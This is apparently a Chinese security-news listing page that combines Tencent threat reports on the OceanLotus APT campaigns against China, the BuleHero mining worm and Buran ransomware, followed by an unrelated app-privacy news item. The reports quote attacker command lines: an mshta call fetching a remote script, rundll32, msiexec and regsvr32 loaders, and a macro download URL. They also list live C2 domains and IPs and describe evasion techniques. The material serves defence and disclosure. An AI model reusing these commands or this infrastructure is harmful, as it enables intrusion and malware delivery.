分类: 国内要闻

“海莲花”(OceanLotus) 2019 年针对中国攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/OA09fndsHfpLVxeo7DnjYg   一、概述 “海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国大陆的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织,甚至没有之一。 腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告,在报告发布之后一直到现在,我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛,包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取。 此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉,如刚出个税改革时候,就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。 而从攻击的手法上看,相对第一季度变化不是太大,但有一些小的改进,包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看,依然采用电子邮件投递诱饵的方式,一旦获得一台机器的控制权后,立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱,只要攻击目标存在价值,攻击会越来越猛烈,对抗也会越来越激烈。 有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告,请参考: https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf 二、攻击特点 2.1  钓鱼邮件的迷惑性 海莲花组织擅长使用鱼叉攻击,通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年,持续对多个目标不断的进行攻击,如下列钓鱼邮件: 从邮件主题来看,大部分邮件主题都非常本土化,以及贴近时事热点。邮件主题包括: 《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示(待审)》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。 我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件,不过在之后的攻击中并未再次发现使用该类型诱饵: 此外,投递钓鱼邮件的账号均为网易邮箱,包括126邮箱和163邮箱,账号样式为:名字拼音+数字@163(126).com,如: Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。 2.2  诱饵类型的多样化 海莲花组织所使用的诱饵类型众多,能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞(CVE-2018-20250)的压缩包等类型外,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。 可执行文件诱饵: Chm诱饵: 白加黑诱饵: 带有宏的恶意office文档: 恶意lnk: 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包: 2.3  载荷执行方式多变 由于诱饵的多样化,载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。 1、 直接执行可执行文件 如该诱饵,伪装为word图标的可执行文件,并在文件描述里修改成了Microsoft DOCX,用于迷糊被钓鱼者。执行恶意文件后,会释放诱饵文档2019年5月标准干部培训课程通知.docx,并且打开,让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档,诱使受害者启用文档中的宏代码以查看文档内容,实际上启用宏之后,仍然看不到正常的内容: 2、 使用rundll32加载恶意dll 如某诱饵在执行后,会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:”C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register 3、 宏 使用宏来执行载荷,且宏代码经过的混淆处理: 4、 Office内存执行恶意shellcode 使用宏代码,在office中直接解密shellcode,在内存中创建线程执行: 5、 dll侧加载(白加黑) 使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。 其中所使用的宿主文件对包括: 白文件原名 黑dll文件名 iTunesHelper.exe AppVersions.dll SGTool.exe Inetmib1.dll Rar.exe ldvptask.ocx GoogleUpdate.exe goopdate.dll 360se.exe chrome_elf.dll Winword.exe wwlib.dll rekeywiz.exe mpr.dll wps.exe krpt.dll wechat.exe WeChatWin.dll 6、 通过com技术执行 通过com技术,把某恶意dll注册为系统组建来执行: 7、 Chm内嵌脚本 Chm执行后,会提示执行ActiveX代码: 其脚本内容为: 不过由于编码处理的问题,该chm打开后为乱码: 而通过手动解压后,原始内容如下: 8、 使用计划任务进行持久性攻击 如上面的chm诱饵执行后,会在%AppData%\Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务: 命令行为:C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll bcdsrv.dll为真正的恶意文件。 9、 lnk调用mstha执行 该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》: 执行lnk后,会调用命令:C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。 10、 使用odbcconf.exe加载文件: odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截: 11、WinRAR ACE(CVE-2018-20250)漏洞 带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)释放一个自解压文件: 该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行: 2.4  多重载荷攻击 我们在最新的攻击活动中,我们首次发现海莲花使用了多重载荷的攻击。 之前的攻击活动中,都是解密shellcode后,就直接执行最终的RAT,如: 而在最新的攻击活动中,我们发现,解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT: 这样使得攻击活动更加的丰富和多样性,并且也可控。 2.5  与安全软件对抗激烈 海莲花也采用了多种对抗安全软件的方式,主要为: 1、 dll的侧加载(白加黑) 该技术上面已详细描述,这里不再赘述。 2、 使用系统文件来执行: 如odbcconf.exe 3、 Office中直接内存执行shellcode 上文也已经描述,这里也不再展开。 4、 添加垃圾数据以扩充文件大小 为了防止该文件被安全厂商收集,海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。 如某文件,填充垃圾数据后,文件大小高达61.4 MB (64,480,256 字节): 5、 每台机器的第二阶段后门都是定制的 每台机器的第二阶段后门文件都是根据当前机器的机器属性(如机器名)来加密定制的,因此每台机器上的文件hash都是不一样,且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉,只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。 6、 通信的伪装 如某次攻击中C2的伪装:根据配置信息,可进行不同的连接和伪装,对C2进行拼装后再进行解析。拼接方式为(xxx为配置C2): {rand}.xxx www6.xxx cdn.xxx api.xxx HTTP Header的伪装: 2.6  定制化的后门 使用定制化的后门(主要是第二阶段下发的后门),海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光:针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。 该后门最终使用白加黑的方式来执行,包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、 XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等组合来执行。 加密流程为: 可以看到,某次针对国家某单位的攻击中,使用的密钥为: 而该受害的用户名为Cao**,可见该木马只专门为了感染该电脑而特意生成的。 2.7  多种恶意软件的选择 从我们的长期跟踪结果来看,海莲花组织使用最终的恶意软件(无论是第一阶段后门还是第二阶段后门)主要有三种,分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多,而修改版的Gh0st则比较少见。 CobaltStrike: Denis: 修改版Gh0st: 2.8  持续的内网渗透 通过钓鱼攻击攻陷一台主机后,海莲花还会不断对被攻击的内网进行渗透攻击活动,以此来渗透到更多的内网机器: 扫描: 获取hash: 打包文件: 此外,还会还会通过powershell,创建计划任务来下载持久化的工具: 最终的恶意文件为goopdate.dll,跟上文所述的第二阶段下发后门一致。 三、可能存在的假旗活动 在跟踪海莲花的过程中,我们还发现了一些跟海莲花活动类似的攻击: 如: 可以看出该批活动跟海莲花的类似:如关键字、使用白加黑等。 而该文件最终的执行的恶意代码为两种: 一种是CobaltStrike生成的Beacon payload; 另一种是metasploit生成的block_reverse_http的paylaod。 虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用,但是之前未发现有metasploit生成的payload,这似乎跟之前的海莲花攻击活动又有些不一致。 此外该批活动的c2都在中国境内(包括中国香港),这似乎跟之前的攻击活动也不大一样: 虽然这波活动在极力模仿海莲花的一些攻击行为,但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗(false flag)活动。因此在这先不做定论,等待更多的证据和关联的依据。 四、总结 海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织,甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光,该组织并未有停手迹象,反而不断更新其技术和武器库,包括诱饵、payload、新的漏洞利用等,此外也有众多跟杀软的对抗手段,如自增文件大小、混淆方式、定制化的payload等。 因此我们提醒相关部门和相关人员,切记提高安全意识,不要随意执行来历不明的邮件的附件,不要被钓鱼信息所蒙蔽。 五、安全建议 1、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码; 2、 及时安装操作系统补丁和Office等重要软件的补丁; 3、 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险; 4、 推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 六、附录 6.1  腾讯御见威胁情报中心 腾讯御见威胁情报中心,是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托腾讯安全在海量安全大数据上的优势,通过机器学习、顶尖安全专家团队支撑等方法,产生包括高级持续性攻击(APT)在内的大量安全威胁情报,帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。 腾讯御见威胁情报中心公众号自开号以来,发布了大量的威胁分析报告,包括不定期公开的针对中国大陆目标的APT攻击报告,无论是分析报告的数量上还是分析报告的质量上,都处于业界领先水平,受到了大量客户和安全专家的好评,同时发布的情报也经常被政府机关做为安全预警进行公告。 以下是腾讯御见威胁情报中心公众号的二维码,关注请扫描二维码: 6.2  IOCs MD5: e7920ac10815428de937f2fca076b94c 4095b9682af13ca1e897ca9cc097ec69 b96de3d0023542f8624b82b9773373e9 5c5f8c80dcb3283afeb092cb0c13a58a c90c7abcee1d98a8663904d739185d16 d249411f003d05c0cea012c11ba13716 3489140891e67807c550aa91c67dc4ad 22f8736bbc96c1a58ab07326d730a235 dade969b00cbc4a0c1b58eeb0e740b63 3c3b2cc9ff5d7030fb01496510ac75f2 d604c33d6ec99a87a672b3202cb60fa7 861fc5624fd1920e9d9cc7a236817dd7 8e2b5b95980cf52e99acfa95f5e1570b 3c8b2d20e428f8207b4324bb58f5d228 a81424e973b310edd50aed37590f4b8a cf5d6d28c388edf58e55412983cf804a 6b8bec74620fbf88263b48c5a11b682e 9eb55481a0b5fcd255c8fb8de1042f88 5c00063b11c4710fe5a5a1adaf208b12 d30bc57624d233d94dc53a62908ef2df 886d0dd67e4cf132a1aed84263d661e3 2b3c5c831eb6b921ac128c4d44d70a7a 1dfb41e5919af80c7d0fa163a90e21e5 C&C: 360skylar.host wechats.asis news.shangrilaexports.com clip.shangweidesign.com jcdn.jsoid.com libjs.inquirerjs.com baidu-search.net sys.genevrebreinl.com ad.ssageevrenue.com tel.caitlynwells.com us.melvillepitcairn.com upgrade.coldriverhardware.com cdnwebmedia.com 43.251.100.20 43.254.217.67 114.118.80.233 6.3  MITRE ATT&CK Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1204 User Execution T1223 Compiled HTML File T1053 Scheduled Task T1117 Regsvr32 Persistence T1179 Hooking T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder Defense Evasion T1107 File Deletion T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp T1117 Regsvr32 Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1005 Data from Local System T1025 Data from Removable Media T1123 Audio Capture T1056 Input Capture T1113 Screen Capture T1115 Clipboard Data Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 6.4  参考链接 https://s.tencent.com/research/report/715.html      

BuleHero 4.0 挖矿蠕虫真疯狂,超十种方法攻击企业,已有3万电脑中招

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/kHF-xcGiQTUKTlleOxfHdg 一、背景 腾讯安全御见威胁情报中心检测到挖矿蠕虫病毒BuleHero于11月11日升级到4.0版。在此次更新中,BuleHero引入了多种新漏洞的使用,包括2019年9月20日杭州警方公布的“PHPStudy“后门事件中涉及的模块漏洞利用。 该团伙善于学习和使用各类Web服务器组件漏洞。包括以前用到的Tomcat任意文件上传漏洞、Apache Struts2远程代码执行漏洞、Weblogic反序列化任意代码执行漏洞,又引入了Drupal远程代码执行漏洞、Apache Solr 远程命令执行漏洞、PHPStudy后门利用,使得其攻击方法增加到十个之多。   BuleHero在进入目标系统后,首先通过命令下载downlaod.exe,然后downlaod.exe下载主模块swpuhostd.exe,swpuhostd.exe释放密码抓取工具,端口扫描工具,永恒之蓝攻击工具进行扫描和攻击,同时依次进行行多种web服务组件的探测和漏洞利用攻击,并在中招电脑下载挖矿木马和远程控制木马。   根据腾讯安全御见威胁情报中心数据,BuleHero挖矿蠕虫病毒目前感染超过3万台电脑,影响最严重地区为广东,北京,江苏,山东等地,影响较严重的行业分别为互联网,科技服务,贸易服务业。 二、详细分析 攻击和传播 攻击模块swpuhostd.exe将自身注册为服务“mekbctynn”,然后释放密码抓取工具mimikatz,扫描工具,永恒之蓝攻击工具到C:\Windows\tqibchipg\目录下。 vfshost.exe为mimikatz为密码抓取工具,可以从内存中获取电脑登录时使用的账号密码明文信息,BuleHero使用抓取到的密码进行横向传播。 tcnuzgeci.exe和trctukche.exe都是端口扫描工具,扫描ip.txt中指定的IP范围,探测139/445/3389/8983等端口,将结果保存至Result.txt中,并在后续的漏洞攻击过程中使用。 而UnattendGC目录下依然存放的是永恒之蓝攻击包文件,目前使用的漏洞攻击工具包括永恒之蓝,双脉冲星,永恒浪漫和永恒冠军。 攻击模块swpuhostd.exe执行以下漏洞攻击过程 Tomcat PUT方式任意文件上传漏洞(CVE-2017-12615),首先通过漏洞上传名为FxCodeShell.jsp的webshell,利用该webshell执行传入的命令下载木马。 Apache Struts2远程代码执行漏洞(CVE-2017-5638),Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行,漏洞影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 –Struts 2.5.10。 Weblogic远程代码执行的反序列化漏洞CVE-2018-2628,漏洞利用了T3协议的缺陷实现了Java虚拟机的RMI:远程方法调用(RemoteMethod Invocation),能够在本地虚拟机上调用远端代码,攻击者利用此漏洞远程执行任意代码。 Thinkphp V5漏洞(CNVD-2018-24942),该漏洞是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可远程执行代码。攻击者利用该漏洞,可在未经授权的情况下,对目标网站进行远程命令执行攻击。 Weblogic反序列化远程代码执行漏洞(CVE-2019-2725),由于weblogic中wls9-async组件的WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 Drupal远程代码执行漏洞CVE-2018-7600,Drupal对Form API(FAPI)AJAX请求的输入环境不够,导致攻击者可以将恶意负载注入内部表单结构,从而执行任意代码。 Apache Solr 远程命令执行漏洞CVE-2019-0193,此漏洞存在于可选模块DataImportHandler中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参数来设置,由于DIH配置可以包含脚本,导致攻击者可利用dataConfig参数构造恶意请求,实现远程代码执行。 PHP的php_xmlrpc.dll模块中的隐藏后门利用,影响版本:phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)。该后门利用事件今年9月由杭州公安在《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》中披露,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭黑客篡改并植入“后门”,后门位于程序包自带的PHP的php_xmlrpc.dll模块中,攻击者构造并提交附带恶意代码的请求包,可执行任意命令。攻击模块swpuhostd.exe执行爆破过程 IPC$远程爆破连接,爆破登录成功后在目标机器利用Psexec工具或者利用WMIC执行远程命令。 在攻击模块的代码中还包含3389(RDP服务)端口扫描行为,虽然目前未根据扫描结果进行下一步动作,但由于该团伙十分活跃,推测其可能在后续的更新中添加RDP漏洞(BlueKeep)CVE-2019-0708的攻击代码。腾讯安全威胁情报中心监测数据表明,仍有相当比例的Windows电脑未修复CVE-2019-0708漏洞,该漏洞存在蠕虫病毒利用风险。 挖矿 BuleHero病毒攻击成功,会将挖矿木马释放到Windows目录下C:\Windows\Temp\geazqmbhl\hvkeey.exe,木马采用XMRig编译,挖矿使用矿池为mx.oops.best:80,mi.oops.best:443。 远程控制 释放远控木马到C:\Windows\SysWOW64\rmnlik.exe目录下,上线连接地址 ox.mygoodluck.best:12000。 三、安全建议 因该病毒利用大量已知高危漏洞攻击入侵,并最终通过远程控制木马完全控制中毒电脑组建僵尸网络,危害极大。腾讯安全专家建议企业重点防范,积极采取以下措施,修复安全漏洞,强化网络安全。   1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html   2.下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞。   XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598   Win7、win8.1、Windows Server 2008、Windows 10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx   3.定期对服务器进行加固,尽早修复服务器文档提及的相关组件安全漏洞,安装服务器端的安全软件;   4.服务器使用高强度密码,切勿使用弱口令,防止被黑客暴力破解;   5.使用腾讯御点终端安全管理系统拦截可能的病毒攻击(下载地址:https://s.tencent.com/product/yd/index.html); 6.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs IP 185.147.34.136 185.147.34.106 172.104.91.191 139.162.2.123   Md5 ecb3266326d77741815ecebb18ee951a 398fb3fed9be2941f3548a5d0d4b862c 6ef68c9b73b1beee2efabaf6dfe11051 f62a9a4720da8f4afb457569465c775c f89544ecbf66e93c2821625861ae8821 b1956fe89e3d032be3a06820c63f95a6   Domain fk.0xbdairolkoie.space zik.fxxxxxxk.me xs.0x0x0x0x0.club rs.s1s1s1s1s.fun qb.1c1c1c1c.best jz.1c1c1c1c.xyz ik.s1s1s1s1s.host ff.s1s1s1s1s.site eq.s1s1s1s1s.asia cu.s1s1s1s1s.pw ce.1c1c1c1c.club wiu.fxxxxxxk.me wc.fuckingmy.life upa2.hognoob.se upa1.hognoob.se uio.hognoob.se uio.heroherohero.info rp.oiwcvbnc2e.stream rp.666.stream qie.fxxxxxxk.me q1a.hognoob.se pxx.hognoob.se pxi.hognoob.se ox.mygoodluck.best oo.mygoodluck.best noilwut0vv.club mx.oops.best mi.oops.best li.bulehero2019.club heroherohero.info haq.hognoob.se fxxk.noilwut0vv.club fid.hognoob.se dw.fuckingmy.life cb.fuckingmy.life bk.oiwcvbnc2e.stream bk.kingminer.club bk.heroherohero.in aic.fxxxxxxk.me a88.heroherohero.info a88.bulehero.in a47.bulehero.in a46.bulehero.in a45.bulehero.in   URL http[:]//fk.0xbdairolkoie.space/download.exe http[:]//fk.0xbdairolkoie.space/ swpuhostd.exe http[:]//xs.0x0x0x0x0.club:63145/cfg.ini http[:]//qb.1c1c1c1c.best:63145/cfg.ini http[:]//ce.1c1c1c1c.club:63145/cfg.ini http[:]//jz.1c1c1c1c.xyz:63145/cfg.ini http[:]//eq.s1s1s1s1s.asia:63145/cfg.ini http[:]//rs.s1s1s1s1s.fun:63145/cfg.ini http[:]//ik.s1s1s1s1s.host:63145/cfg.ini http[:]//cu.s1s1s1s1s.pw:63145/cfg.ini http[:]//ff.s1s1s1s1s.site:63145/cfg.ini   参考链接: https://www.freebuf.com/column/180544.html https://www.freebuf.com/column/181604.html https://www.freebuf.com/column/197762.html https://www.freebuf.com/column/204343.html

Buran 勒索病毒传入我国,用户宜小心处理不明邮件

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/jm7Q9JvsdUzfv5xELXMJ9Q 腾讯安全御见威胁情报系统捕获到一款通过邮件向用户投递附带恶意宏的word文档,若用户下载邮件附件,启用宏代码,就会下载激活勒索病毒,导致磁盘文件被加密。该勒索病毒会在注册表和加密文件中写入“buran”字符串,故命名为buran勒索病毒。 一、概述 腾讯安全御见威胁情报系统捕获到一款通过邮件向用户投递附带恶意宏的word文档,若用户下载邮件附件,启用宏代码,就会下载激活勒索病毒,导致磁盘文件被加密。该勒索病毒会在注册表和加密文件中写入“buran”字符串,故命名为buran勒索病毒。 根据腾讯安全御见威胁情报中心的监测数据,该勒索病毒的感染主要在境外,有个别案例已在国内出现,腾讯安全专家提醒中国用户小心处理来历不明的邮件,不打开陌生人发送的用途不明的Office文档,不要启用宏功能。 二、详细分析 1、word附件 用户打开word文档,恶意宏代码会从hxxp://54.39.233.131/word1.tmp处下载勒索病毒到C:/Windows/Temp/sdfsd2f.rry运行,word文档内容、宏代码如下图: 2、勒索病毒样本(sdfsd2f.rry) 使用WinInet函数访问geoiptool.com、iplogger.com地址获取受害机的IP地址信息; 调用cmd程序复制样本到C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\lsass.exe,并置注册表run键开机启动; 使用ShellExecuteW( )函数,参数”C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\lsass.exe” -start启动样本; 调用cmd程序删除sdfsd2f.rry样本; 3、lsass.exe进程 调用cmd程序禁用系统自动修复功能、删除系统备份、删除RDP连接历史记录、清空Application、Security、System日志,关闭日志服务开机启动; 注册表保存公钥key、受害机id; 再次创建lsass.exe进程,参数C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\lsass.exe -agent 1,遍历磁盘文件,加密用户数据; 为每一个文件生成256位key,使用AES-256-CBC加密文件; 生成密钥对RSA-512,公钥用来加密256位key,内容存放到文件中; 私钥被注册表中的RSA公钥加密存放文件中; 以下后缀名文件会被跳过; 文件开头写入“BURAN”标志,防止文件被重复加密; 文件内容被加密后,使用代表受害机ID的后缀重命名文件; 生成勒索信息 弹出勒索信息; 调用cmd程序删除lsass.exe样本; 国外论坛某用户花了3000$才恢复了所有数据; 三、安全建议 企业用户针对该病毒的重点防御措施: 1、对重要文件和数据(数据库等数据)进行定期非本地备份,可启用腾讯电脑管家或腾讯御点内置的文档守护者功能,利用磁盘冗余空间自动备份文档; 2、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码。   企业用户通用的防病毒扩散方法: 1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 6、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。   个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码; 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患; 3、 使用腾讯电脑管家查杀拦截该病毒。 IOC MD5: 4ac964a4a791864163476f640e460e41 f9190f9c9e1f9a8bd61f773be341ab91 328690b99a3fc5f0f2a98aa918d71faa f4cb791863f346416de39b0b254e7c5e cfab38b5c12a8abcbdadfc1f5ac5c37d 99837e301d8af9560a4e6df01a81dc39 IP: 54.39.233.131 URL: hxxp://54.39.233.131/word1.tmp

航旅纵横新功能泄露用户隐私 回应:完全不符合事实

讯 北京时间9月24日下午消息,针对航旅纵横App的社交新功能泄露用户隐私的新闻报道,航旅纵横在微博发布声明称近期个别媒体针对航旅纵横发表了泄露用户隐私等完全不符合事实的报道,对其产生了严重的负面影响,对不实报道将保留法律追诉权。 据报道,有网友反映,在航旅纵横上选座之后,陌生人可以看到自己的名字和头像(并且已经受到骚扰),自己也可以查询到陌生人的名字和头像,以此质疑航旅纵横泄露客户的隐私。 对于质疑,航旅纵横回应称出行互动功能是航旅纵横在2018年6月上线的一个探索性功能,至今未做更新迭代。该功能默认关闭,虚拟身份与真实身份也是完全隔离的。 在此次的微博声明中,航旅纵横表示一直高度重视信息安全工作,通过多种技术手段以严格保护用户信息安全,并通过了相关主管部门的审核认定。 以下是航旅纵横完整声明内容: 关于个别媒体不实报道的声明 一直以来我司都欢迎社会各界提出意见和建议,对我们的工作进行监督与指导,但近期个别媒体针对航旅纵横发表了泄露用户隐私等完全不符合事实的报道,对我司产生了严重的负面影响,严重损害了我司合法权益,我们深感遗憾,对不实报道我们将保留法律追诉权。我们特郑重澄清和声明如下: 一、出行互动功能是航旅纵横在2018年6月上线的一个探索性功能,至今未做更新迭代。该功能上线前,我们把用户隐私保护作为核心要点 进行了深入研讨,力求在用户隐私保护万无一失的基础上开展业务探索。通过建立虚拟身份开通提示确保用户在知情的情况下开启互动功能,通过用户自行设置虚拟身份信息确保用户隐私数据的绝对安全,通过建立完备的虚拟身份信息修改注销功能保证用户意愿得到充分尊重。用户间仅可以查看到虚拟信息,不存在个人隐私数据泄露问题。 二、该功能是默认关闭的,上线初始时所有用户的虚拟个人主页均默认为关闭状态。用户上线后点击该功能开通虚拟身份前,会弹窗增强式 告知明确提示虚拟身份用于与他人互动。只有用户同意建立后才会开启,用户不建立虚拟身份也不会影响任何其他功能的使用,截至目前仍 有很多用户根据个人需求未开启此项功能。 三、虚拟身份与真实身份是完全隔离的。虚拟身份不仅是由用户根据 自己的意愿自主选择是否开启,且所有包含的内容都需要用户逐项手动 添加或选择。用户也可以随时对填写的内容进行修改,用户对于功能的开启、使用及关闭都有充分的自主权。用户开通虚拟身份后,仅通过用户自主填写的内容他人才可见,而用户的个人真实信息他人是无法看到的,不存在任何用户个人隐私泄露的问题。 四、虚拟身份只需用户在底部菜单栏点击“我”进入账户信息页,在账户信息的授权管理中即可注销。航旅纵横致力于帮助用户建立一条获取 权威信息的智能通道,每一个真实用户只能注册一次,为保护用户权益,在注册过程中需进行严格的身份认证。如用户不再使用航旅纵横,希望注销航旅纵横主账号时,同样需要核实用户真实身份,以避免他人盗用,保护账号使用者的权益。 航旅纵横一直高度重视信息安全工作,通过多种技术手段以严格保护用户信息安全,并通过了相关主管部门的审核认定。航旅纵横始终致力于探索利用创新技术提升民航业整体服务水平,得到了行业和广大用户的高度认可,并被上级部门评价为改革开放40年国有企业在互联网领域 取得的重大突破。未来我们也将继续坚持以用户为核心,为广大用户提供更加高效、便捷的服务,为民航行业注入更多的科技元素。 感谢大家一直以来的支持! 中航信移动科技有限公司 2019年9月24日 航旅纵横     (稿源:,稿件以及封面源自网络。)

习近平论网络安全十大金句

